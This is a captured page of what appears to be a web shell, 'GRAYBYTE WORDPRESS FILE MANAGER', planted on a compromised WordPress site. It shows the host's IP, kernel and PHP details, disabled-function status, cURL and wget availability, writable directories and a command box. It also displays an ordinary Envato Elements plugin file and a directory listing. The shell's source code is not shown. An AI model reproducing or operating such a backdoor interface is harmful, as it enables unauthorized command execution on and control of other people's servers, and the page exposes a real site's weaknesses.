GRAYBYTE WORDPRESS FILE MANAGER6291

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/chahida.co.in/wp-content/plugins/envato-elements/inc/api/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/chahida.co.in/wp-content/plugins/envato-elements/inc/api//class-api.php
<?php
/**
 * Envato Elements: Options
 *
 * Making option management a bit easier for us.
 *
 * @package Envato/Envato_Elements
 * @since 2.0.0
 */

namespace Envato_Elements\API;

use Envato_Elements\Utils\Base;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}


/**
 * API base class
 *
 * @since 2.0.0
 */
abstract class API extends Base {

	public function __construct() {
		$this->register_api_endpoints();
	}

	public function rest_permission_check( $request ) {
		return current_user_can( 'edit_posts' ) && current_user_can( 'upload_files' );
	}

	public function register_endpoint( $endpoint, $callback ){
		register_rest_route(
			ENVATO_ELEMENTS_API_NAMESPACE,
			$endpoint,
			[
				[
					'methods'             => \WP_REST_Server::CREATABLE,
					'callback'            => $callback,
					'permission_callback' => [ $this, 'rest_permission_check' ],
					'args'                => [],
				],
			]
		);
	}

	/**
	 * @param array $data
	 *
	 * @return \WP_REST_Response
	 */
	public function format_success($data) {
		return new \WP_REST_Response( $data, 200 );
	}

	/**
	 * @param $endpoint
	 * @param $error_code
	 * @param $error_message
	 * @param array $additional_data
	 *
	 * @return \WP_REST_Response
	 */
	public function format_error($endpoint, $error_code, $error_message, $additional_data = []){
		return new \WP_REST_Response( [
			'error' => [
				'context' => $endpoint,
				'code' => $error_code,
				'message' => $error_message,
				'data' => $additional_data,
			]
		], 500 );
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:29
giriqfky / giriqfky
0644
class-api.php
1.495 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-banners.php
1.086 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-photos-import.php
5.984 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-photos-search.php
1.803 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-project-name.php
1.092 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-requirements.php
9.783 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-settings.php
12.623 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-subscription-api.php
2.05 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-template-kit-import.php
16.31 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-template-kit-install.php
8.651 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-template-kit-search.php
4.726 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF